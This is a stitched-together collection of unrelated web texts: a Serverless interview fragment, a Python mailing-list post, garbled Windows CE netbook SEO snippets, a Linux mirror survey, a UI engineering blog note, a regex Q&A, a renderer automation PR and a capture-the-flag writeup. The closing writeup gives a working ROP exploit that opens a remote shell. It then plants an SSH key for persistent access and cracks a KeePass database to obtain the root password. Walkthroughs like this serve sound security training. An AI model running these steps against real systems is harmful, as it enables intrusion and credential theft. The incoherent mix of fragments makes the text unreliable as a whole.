Dilawari: [Serverless] released Java Lambda as well. That's extremely exciting for us, because we are a Scala shop, and we'd love to continue writing Scala. Scala definitely works well when writing in the Java ecosystem. Some of our use cases don't need an API; they're S3 notifications. So, we can still leverage Serverless for that.
Are you worried about AWS lock-in with Lambda?
Dilawari: With a framework like Serverless, if we were to move to Google or anything else, I think we'd be able to migrate over. I don't think it would be a transparent migration, but I think you can move over. I wouldn't be as worried about that.
|
OPCFW_CODE
|
generating canonical list of tuples?
joshm at taconic.net
Fri Jan 4 08:24:19 CET 2002
> Option 1: Recursion. Recursion will cause a memory explosion when the
> limit and dimension begin to grow, and so this isn't a good solution.
> Option 2: Exec. Construct a line of python code dynamically based on the
> above example, and exec it. Would this be considered a good solution?
> Option 3: ???
Ok, so I've tried a function which brute force cranks out the tuples by
adding one to the last element, carrying it over, etc. And I wrote the exec
method. And I wrote the recursion method. The exec runs at least six times
faster than the brute force method. Recursion causes memory to dump even
sooner, since there are tons of redundant lists to gc. The code for the
exec method is as follows:
def genWhiteTuples(total, blocks):
    # Produce the set of all tuples with "blocks" elements, where
    # the sum of the elements is less than or equal to "total".
    # For example, genWhiteTuples(5, 3) returns
    # [ (1,1,1), (1,1,2), (1,1,3), (1,2,1), (1,2,2),
    #   (1,3,1), (2,1,1), (2,1,2), (2,2,1), (3,1,1) ]
    # Create an evil list comprehension to compute...
    # [ (x1,x2,x3,...) for x1 in range(1,f+1) for x2 in range(1,f+2-x1)
    #   for x3 in range(1,f+3-x1-x2) ... ]
    # where f is the max value of the first element of the tuple.
    f = total - blocks + 1
    sub = ''
    elements = []
    clauses = []
    for i in range(1, blocks + 1):
        elements.append('x%d' % i)
        clauses.append('for x%d in range(1, f+%d%s)' % (i, i, sub))
        sub = '%s-x%d' % (sub, i)
    if len(elements) == 1:
        tup = '(%s,)' % elements[0]
    else:
        tup = '(' + ','.join(elements) + ')'
    cmd = 'good = [ %s %s ]' % (tup, ' '.join(clauses))
    exec cmd  # build and run the generated list comprehension
    return good
This is pretty cool, but also pretty unmaintainable. Is there a better
solution? By the way, trying to compute genWhiteTuples(39, 6) caused my
machine to run out of paging space after burning about 500MB. :-) I'm
still working on a better algorithm than this, since even with making this
run better, it'll still consume the same RAM.
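For what it's worth, here is a sketch of one alternative in modern Python (generators weren't an option in 2002): a recursive generator that yields each tuple lazily, so memory use is proportional to the tuple length rather than to the size of the output.

    def gen_white_tuples(total, blocks):
        # Lazily yield every tuple of `blocks` positive integers whose
        # sum is <= `total`, in the same order as genWhiteTuples.
        def rec(prefix, budget, slots):
            if slots == 0:
                yield tuple(prefix)
                return
            # Reserve at least 1 for each remaining slot.
            for v in range(1, budget - slots + 2):
                prefix.append(v)
                for t in rec(prefix, budget - v, slots - 1):
                    yield t
                prefix.pop()
        return rec([], total, blocks)

Iterating gen_white_tuples(39, 6) this way never holds more than one tuple in memory at a time, though of course consuming all of them still takes the same amount of work.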
|
OPCFW_CODE
|
Windows Ce Netbook Applications 23
WinCESoft Software for Windows CE, .. Direct X for Windows CE.. .
Msdn forums - Windows Embedded Compact Platform Development
Windows Embedded Compact Platform Development .. a Windows CE driver? then you .. one for CE native applications development and another one .
Windows-CE Based FirstView PC-706 Netbook Spotted at CES
Windows-CE Based FirstView PC-706 Netbook .. is bright and crisp and fortunately the built-in Windows CE applications really maximize the limited .
Windows Ce 6 0 - Free downloads and reviews - CNET .
windows ce 6 0 free download - Learn Visual Basic 6, Facebook for Windows Mobile 6, Windows CE 5.0: Standard Software Development Kit (SDK), and many more programs
Steps needed to install Windows Embedded CE 6.0 from .
Steps needed to install Windows Embedded CE 6.0 .. (Does TUX work for non driver unmanaged applications?) .. "Windows Mobile and Windows Embedded CE .
Netbook - Free downloads and reviews - CNET Download.com
netbook free download - Netbook Optimizer, Netbook Tracer, Ubuntu Netbook Edition, .. View all Windows apps.. Popular Android Apps TubeMate 3.. TubeMate.
Portable apps on Notebook running Windows CE 5.0 .
Portable apps on Notebook running Windows CE 5.0 .. Netbook with CE .. .. prices and where to buy or download have any relevance to portable applications.
Netbook - Wikipedia
.. weight, a 9 in (23 cm .. with the availability of a 'netbook' version of Windows XP, .. Windows CE has also been used in netbook applications, .
windows ce 7.0
Applications can then be written which .. Another issue that has arisen with Windows CE is that different host devices support .
Windows ce 7 Applications/software? MajorGeeks.Com .
Windows ce 7 Applications/software? Discussion in 'Software' started by Nexus, Jun 6, 2012.. Nexus Sergeant.. .. You want a netbook that runs windows, not windows CE.
|
OPCFW_CODE
|
Mirroring popular linux package manager repositories
I've started collecting a list of the most widespread linux distros and their package repositories, including size, update frequency, methods of mirroring, and lists of mirrors, with the aim of looking for repeating patterns that we can focus on supporting
Spoiler: All the linux package managers use regular rsync runs for mirroring, sometimes via a custom script that checks a last modified file time before attempting to download updates.
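For illustration, here is a minimal Python sketch of that pattern; the trace URL, rsync module, and local paths below are placeholders, not real endpoints:

    import pathlib
    import subprocess
    import urllib.request

    TRACE_URL = "https://mirror.example.org/debian/project/trace/master"  # placeholder
    RSYNC_SRC = "rsync://mirror.example.org/debian/"                      # placeholder
    DEST = "/srv/mirror/debian/"
    STAMP = pathlib.Path("/srv/mirror/.last-sync")

    def sync():
        remote_stamp = urllib.request.urlopen(TRACE_URL).read()
        if STAMP.exists() and STAMP.read_bytes() == remote_stamp:
            return  # upstream unchanged; skip the expensive rsync run
        subprocess.run(["rsync", "-rt", "--delete", RSYNC_SRC, DEST], check=True)
        STAMP.write_bytes(remote_stamp)

    if __name__ == "__main__":
        sync()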
| Distro   | Size  | Frequency |
|----------|-------|-----------|
| Debian   | 2.4TB | 6 hours   |
| Ubuntu   | 1.1TB | 6 hours   |
| Fedora   | 1.5TB | 10 mins   |
| CentOS   | 400GB | 6 hours   |
| FreeBSD  | 1.4TB | 24 hours  |
| openSUSE | 3TB   | 6 hours   |
| Arch     | 130GB | 1 hour    |
| Gentoo   | 550GB | 4 hours   |
| Alpine   | 560GB | 1 hour    |
Debian
Mirrors: https://www.debian.org/mirror/list
Mirroring method: ftpsync (rsync under the hood)
Mirroring docs: https://www.debian.org/mirror/ftpmirror
Total size: 2.4TB
Update frequency: 6 hours
Ubuntu
Mirrors: https://launchpad.net/ubuntu/+archivemirrors
Mirroring method: https://wiki.ubuntu.com/Mirrors/Scripts (rsync)
Mirroring docs: https://wiki.ubuntu.com/Mirrors
Total size: 1.1TB
Update frequency: 6 hours
Fedora
Mirrors: https://admin.fedoraproject.org/mirrormanager/
Mirroring method: quick-fedora-mirror (rsync)
Mirroring docs: https://fedoraproject.org/wiki/Infrastructure/Mirroring
Total size: 1.5TB
Update frequency: 10 minutes
CentOS
Mirrors: https://www.centos.org/download/mirrors/
Mirroring method: rsync
Mirroring docs: https://wiki.centos.org/HowTos/CreatePublicMirrors
Total size: 400GB
Update frequency: 6 hours
FreeBSD
Mirrors: https://www.freebsd.org/doc/handbook/eresources-web.html
Mirroring method: rsync
Mirroring docs: https://www.freebsd.org/doc/en_US.ISO8859-1/articles/hubs/mirror-howto.html
Total size: 1.4 TB
Update frequency: daily
openSUSE
Mirrors: https://mirrors.opensuse.org/
Mirroring method: rsync
Mirroring docs: https://en.opensuse.org/openSUSE:Mirror_howto
Total size: 3TB
Update frequency: 6 hours
Arch Linux
Mirrors: https://www.archlinux.org/mirrorlist/all/
Mirroring method: rsync
Mirroring docs: https://wiki.archlinux.org/index.php/Mirrors
Total size: 130GB
Update frequency: 1 hour
Gentoo
Mirrors: https://www.gentoo.org/support/rsync-mirrors/
Mirroring method: rsync
Mirroring docs: https://wiki.gentoo.org/wiki/Project:Infrastructure/Mirrors/Source
Total size: 550GB
Update frequency: 4 hours
Alpine
Mirrors: https://mirrors.alpinelinux.org/
Mirroring method: rsync
Mirroring docs: https://wiki.alpinelinux.org/wiki/How_to_setup_a_Alpine_Linux_mirror
Total size: 560GB
Update frequency: 1 hour
This will get merged into #78. FYI n stuff.
|
GITHUB_ARCHIVE
|
In yesterday’s email, I pontificated about the challenges and potential payoffs presented when taking on complex UI engineering work like that demonstrated in this article about the Google Photos web app.
I find this case study fascinating for a number of reasons, so I’m going to indulge in some more pontification today.
The team’s ambitious vision for the product involved trying to satisfy multiple goals:
- Be able to jump to any part of a huge photo library
- Fill the width of the browser and preserve the aspect ratio of each photo
- 60fps scrolling
- Instantaneous feel
Imagine for a minute that you’ve been hired as lead UI engineer on this project. You’d be forgiven for running away somewhere for a bit of a cry and some alone time once you’d seen that list of requirements.
Believe me, this is a good sign, because it means you understand the constraints of the medium, platform and the diverse capabilities of users’ devices.
For me, once I’d got the initial shock out of my system, my problem-solving and reasoning systems would kick in, resulting in a rapid-fire set of thoughts aimed at reducing the size of this challenge.
My thoughts would likely include, in no particular order:
- This will never work.
- We could maybe achieve 2-3 of these at one time, but not all of them.
- Achieving all of these will require some genuine abuse of the web platform and some disgusting hacks that will make me feel ashamed, assuming they’re even possible.
- Maybe we could do all of this in WebGL? Or canvas? Or using that rendering library that got millions in funding and then disappeared? What was it called?
- Assuming performance is the most important feature, can we treat number 2. as a nice-to-have and quietly ditch it later? Would that even make it easier?
- What about that career change I was considering?
- I need to go away and read up on scrolling and rendering performance.
- We’re going to need to make the case for lots of time experimenting to get anywhere close.
The very worst response to facing these requirements is to promise that they will be achieved.
The second worst response is to provide a time-based estimate of how long it will take to achieve it.
When you’re embarking on something that is not a solved problem and doesn’t have clear patterns of execution that are well documented, you’re taking on a lot of risk.
And the best way to mitigate risk like this is to experiment progressively. Treat it as team learning exercise. Identify the heart of the challenge - the riskiest aspect - and go at it full on, until you have a clear understanding of its shape and nature. Then move outwards to tackle other aspects and see how doing so impacts other goals.
Are some of the goals mutually exclusive? Is solving one far more costly than others? How far are you stretching the capabilities of the platform? How will this impact real users?
Then you can start discussing the pros and cons of proceeding, for project risk, for upside to users, for maintenance costs, and so on.
Ultimately, you have to remember that the article is likely to be an example of survivor and hindsight biases. The team successfully achieved their ambitious goals, and so decided to write about the work they did, after they did it. The same is far less likely to happen for similarly ambitious but unsuccessful projects.
We can learn a huge amount by taking on difficult work like this, because it stretches us. But we can only do so in a safe space where even outright failure can count as a successful outcome.
All the best,
|
OPCFW_CODE
|
Implement renderer screenshot automation
This change proposes a strategy to automatically collect updated screenshots for third party renderers over time to satisfy the requirements of #358. This tooling will provide critical support as we approach #309 and #360. Some high level details of the change:
A Filament-based glTF renderer (gltf_renderer) has been introduced
gltf_renderer is a mash-up of the gltf_viewer and frame_recorder samples in the Filament repo
Generates a PNG representing a staged model given a glTF, a cmgen-produced IBL, a width and a height
gltf_renderer is built by applying a patch on top of the Filament project repository and running Filament's build script
Should serve as a baseline for future staging customizations
Screenshots can be updated by invoking npm run update-screenshots
Uses fidelity test configuration to determine what needs to be rendered / updated
Attempts to build cmgen and gltf_renderer from scratch if they are not available
Generates IBL artifacts with cmgen if they are not available
Eventually this command should encompass more renderers as we discover how best to automatically collect their render results
A startup/provisioning script has been introduced to enable an Ubuntu VM or similar environment to produce screenshots
Cloud infrastructure has been provisioned to automatically produce screenshot update PRs based on daily checks performed at midnight (see below for details)
Automation strategy
In order to minimize the effort required to keep screenshots up to date, and also to reduce the likelihood of frustration arising from inconsistencies in local dev environments, cloud infrastructure has been introduced to automate screenshot collection updates.
Virtual infrastructure limitations
Initially, I expected that we could accomplish this as a specialized CI build on Travis. However, Filament requires a minimum OpenGL version of 4.1 to run. Initial investigation of Travis options here proved discouraging. It seems that a lot of standard virtual infrastructure does not support a recent enough version of OpenGL due to limitations of VMWare support in the Mesa GL driver.
In the end I was able to build Filament in Travis, but we are unable to use Travis to render because Filament cannot find a suitable rendering backend.
Enter GCP
Thankfully, the requirements for our automation are pretty basic: provision an environment to build Filament (and other renderers in the future), take some screenshots and then make a PR.
I turned to GCP in the hopes that a VM with attached GPU would offer a suitable version of OpenGL for rendering Filament. And I'm happy to report: it does.
The infrastructure that has been put in place is modeled after the one diagrammed in a Google Cloud Scheduler tutorial:
The arrangement specific to our own infrastructure can be described as follows:
A VM instance rendermatic is presumed to have been created with an attached GPU, and with the startup script introduced by this change.
Every day at midnight, a PubSub message is dispatched to awaken rendermatic
PubSub message is observed by a designated Cloud Function, which starts the rendermatic VM (see the sketch after this list)
As rendermatic boots up, the startup script runs, producing screenshots and crafting a PR if necessary
As the startup script concludes, rendermatic is powered off
If there was any problem leading to rendermatic not being powered off, a subsequently scheduled PubSub message at 2 AM invokes a final Cloud Function that shuts down the VM
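For reference, a minimal Python sketch of what those start/stop Cloud Functions could look like; the project and zone are placeholders, since they aren't spelled out here:

    import googleapiclient.discovery

    PROJECT = "my-gcp-project"   # placeholder
    ZONE = "us-central1-a"       # placeholder
    INSTANCE = "rendermatic"

    def start_rendermatic(event, context):
        # Pub/Sub-triggered entry point: power on the screenshot VM.
        compute = googleapiclient.discovery.build("compute", "v1")
        compute.instances().start(project=PROJECT, zone=ZONE, instance=INSTANCE).execute()

    def stop_rendermatic(event, context):
        # 2 AM failsafe: make sure the VM is powered off.
        compute = googleapiclient.discovery.build("compute", "v1")
        compute.instances().stop(project=PROJECT, zone=ZONE, instance=INSTANCE).execute()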
Generated update PRs
The automation infrastructure produces PRs if (and only if) there are changes among the fidelity test goldens checked into the repository. Here is an example of what the automatically crafted PRs look like:
It is expected that a human reviewer will look over the automatically generated PR before it is merged so that we can stay on top of any significant changes that occur in third party renderers over time.
Fixes #358
This has been rebased to include the changes (and notably the fidelity test) that landed in #338
I discovered that the Filament renderer does not produce consistently sized render PNGs. On so-called high-DPI displays, the PNGs can be a multiple of the dimensions passed in by the invoker. I'm working on extending the Filament patch to address this.
In https://github.com/GoogleWebComponents/model-viewer/pull/351/commits/576c64ad370752c60ec49c9017230f956cf7f0d5 I expanded FilamentApp to support a callback for configuring the SDL_Window instance. This affords the gltf_renderer app an opportunity to decide if the window should be resized on account of UI scaling factor. There is no consistent notion of UI scaling factor, so it is inferred by comparing the "display" size (the absolute pixel dimensions of the rendered image) and the "window" size (the requested dimensions of the window in scaled pixels).
Good find on the scaling! I've added comments, but looking back through them they're not blockers.
|
GITHUB_ARCHIVE
|
I read http://swtch.com/~rsc/regexp/regexp1.html and in it the author says that in order to have backreferences in regexs, one needs backtracking when matching, and that makes the worst-case complexity exponential. But I don't see exactly why backreferences introduce the need for backtracking. Can someone explain why, and perhaps provide an example (regex and input)?
To get directly at your question, you should make a short study of the Chomsky Hierarchy. This is an old and beautiful way of organizing formal languages in sets of increasing complexity. The lowest rung of the hierarchy is the Regular Languages. You might guess - and you'd be right - that the RL's are exactly those that can be represented with "pure" regular expressions: Those with only the alphabet, empty string, concatenation, alternation |, and Kleene star * (look Ma, no back references). A classic theorem of formal language theory - Kleene's Theorem - is that DFAs, NFAs (as described in the article you cited), and regular expressions all have exactly the same power to represent and recognize languages. Thompson's construction given in the article is a part of the theorem's proof.
Every RL is also a CFL. But there are infinitely many CFLs that aren't regular. A feature that can exist in CFLs that makes them too complex to be regular is balanced pairs of things: parentheses, begin-end blocks, etc. Nearly all programming languages are CFLs. CFLs can be efficiently recognized by what's called a pushdown automaton. This is essentially an NFA with a stack glued on. The stack grows to be as big as needed, so it's no longer a finite automaton. Parsers of real programming languages are nearly all variations on pushdown automata.
Consider a regex with a back reference such as
(.*x)\1
In words, this represents strings of length 2n for some n whose two halves are equal, so in particular both the n'th and 2n'th characters are x.
This is exactly why back references cause problems! They allow "regular expressions" that represent languages that aren't regular. Therefore there is no NFA or DFA that can ever recognize them.
But wait, it's even worse than I've made it out to be so far. Consider
(.*x)\1\1
We now have strings of length 3n whose three thirds are all equal, with the n'th, 2n'th, and 3n'th elements all x.
Back references allow these supercharged regexes to represent languages that are three rungs up the Chomsky Hierarchy: the Context Sensitive Languages. Roughly speaking, the only way to recognize a CSL is to check all strings in the language of equal length (at least if P!=NP, but that's true for all practical purposes and a different story altogether). The number of such strings is exponential in the length of the one you're matching.
This is why a searching regex matcher is needed. You can be very clever in the way you design the search. But there will always be some input that drives it to take exponential time.
So I agree with the author of the paper you cited. It's possible to write perfectly innocent looking regexes with no back refs that will be efficiently recognized for nearly all inputs, but where there exists some input that causes a Perl or Java or Python regex matcher - because it is a backtracking search - to require millions of years to complete the match. This is crazy. You can have a script that's correct and works fine for years and then locks up one day merely because it stumbled onto one of the bad inputs. Suppose the regex is buried in the message parser of the navigation system in the airplane you're riding...
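If you'd like to see the effect first-hand, here is a small Python demonstration using a classic pathological pattern (not one from the article):

    import re
    import time

    # No back references at all -- yet Python's backtracking engine takes
    # exponential time on one crafted, non-matching input.
    pattern = re.compile(r"^(a+)+$")

    for n in (20, 22, 24, 26):
        s = "a" * n + "b"   # almost matches, but never can
        start = time.time()
        pattern.match(s)
        print(n, "->", round(time.time() - start, 2), "seconds")

Each additional 'a' roughly doubles the running time, because the engine retries every way of splitting the run of a's between the two +'s.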
By request, I'll sketch how the Pumping lemma can be used to prove that the language of (.*x)\1 is not regular.
Proof of the PL depends on the fact that every regular language corresponds to some DFA. An accepted input to this DFA longer than its number of states (which equates to L in the lemma) must cause it to "loop:" to repeat a state. Call this state X. The machine consumes some string R to get from the start to X, then S to loop back to X, then T to get to an accepting state. Well, adding extra copies of S (or else deleting S) in the input correspond only to a different number of "loops" from X back to X. Consequently, the new string with additional (or deleted) copies of S will also be accepted.
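For reference, the lemma's standard statement in the same R/S/T notation: every regular language $A$ has a constant $L \ge 1$ such that each $w \in A$ with $|w| \ge L$ factors as

$$ w = RST, \qquad |RS| \le L, \quad |S| \ge 1, \quad RS^{i}T \in A \ \text{ for all } i \ge 0. $$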
Since every RL must satisfy the PL, a proof that a language is not regular proceeds by showing that it contradicts the PL. For our language, this is not hard. Suppose you are trying to convince me the language of (.*x)\1 is regular. Some DFA would then recognize it; take L to be its number of states and feed it the accepted string a^L x a^L x. The repeated state occurs somewhere in the first L characters, which are all a's, so deleting the loop substring S removes some s >= 1 of those a's, and the DFA must still accept a^(L-s) x a^L x. But that string is no longer two identical halves ending in x (the only way its two x's can sit at positions n and 2n is if the runs of a's have equal length), so it is not in the language. Contradiction.
Since it's not regular, Kleene's theorem tells us there is no DFA, NFA, nor "pure" regex that describes it.
The proof that back refs allow languages that aren't even context free has a very similar ring but needs background on pushdown automata that I'm not going to give here. Google will provide.
NB: Both of these fall short of proof that back refs make recognition NP complete. They merely say in a very rigorous way that back refs add real complexity to pure regular expressions. They allow languages that can't be recognized with any machine having finite memory, nor any with only an infinitely large LIFO memory. I will leave NP completeness proof to others.
The fast NFA/DFA algorithms discussed in the linked article, Regular Expression Matching Can Be Simple And Fast, are fast because they can work with a finite number of states (independent of input length) as described in the article.
Introducing backreferences makes the number of states (almost) "infinite" (in the worst case about 256^n, where n is the length of the input). The number of states grows because every possible value of every backreference becomes a state of the automaton.
Thus using a finite-state machine is no longer fitting/possible, and backtracking algorithms have to be used instead.
There are some excellent examples in this tutorial:
The particular case that you will be interested in is shown in 'Backtracking Into Capturing Groups' - it's explained there how the whole match can be given up several times before the final one can be found that matches the whole regex. Also, it's worth noting that this might lead to unexpected matches.
Very interesting document: Extending Finite Automata to Efficiently Match Perl-Compatible Regular Expressions, which supports back-references and counted occurrences efficiently with a modified NFA.
|
OPCFW_CODE
|
Machine IP: 10.10.10.147
DATE : 16/09/2019
START TIME: 8:42 PM
I've got two open ports and one filtered port. Obviously we'll start our enumeration with the HTTP service.
If we visit the website we'll get the Apache2 Debian Default Page.
I ran gobuster on it but found nothing there.
It says something about myapp and port 1337. So first I visited the URL http://10.10.10.147/myapp, which gave me myapp. This was an ELF binary which supposedly echoes back the command we enter, but we don't see any output.
You can follow Ippsec’s Bitterman to understand the process of exploiting this binary.
from pwn import *

r = remote('10.10.10.147', '1337')

# Found offset: 120
junk1 = b"\x90" * 120
junk2 = b"\x90" * 16
shtext = b"/bin/sh\x00"  # just 8 bytes.

r.recvuntil("average")
r.recvuntil("\n")

plt_system = p64(0x401040)
plt_main = p64(0x40115f)
pop_r131415_ret = p64(0x401206)  # pop the shtext inside stack, then fill others with nop
mov_rsp_to_rdi = p64(0x401156)   # followed with a jmp r13

payload = junk1 + pop_r131415_ret + plt_system + junk2 + mov_rsp_to_rdi + shtext + plt_main
r.send(payload)
r.interactive()
This exploit will give us shell on the system.
If we look at the user's home directory we can see some images, a password file, and the user flag. First I got the user flag.
Once I had the user flag, I decided to grab the user's SSH key, but there wasn't one. The .ssh folder in /home/user only had an authorized_keys file, so I copied my own public key there so I could log in via SSH.
There are a lot of images there, so I downloaded them and tried some steganography tools, but none of the images had anything hidden in them. So I shifted my focus to MyPasswords.kdbx. I downloaded the file using
➜ scp email@example.com:/home/user/MyPasswords.kdbx ./
Then I ran
$ keepass2john MyPasswords.kdbx > hash.txt
And tried cracking it, but then @FolkLore_93 gave me a hint that I needed to use one of the images as a keyfile. So I started trying them one after the other:
➜ keepass2john -k IMG_0547.JPG MyPasswords.kdbx > hash.txt
This gave me the password in a minute.
Once I had the cracked password, I used it together with the image keyfile to open the database, and in it I found the password for the root user.
After that I ran su root and used that password to become root.
Thanks for reading. Feedback is always appreciated.
Follow me @0xmzfr for more “Writeups”.
|
OPCFW_CODE
|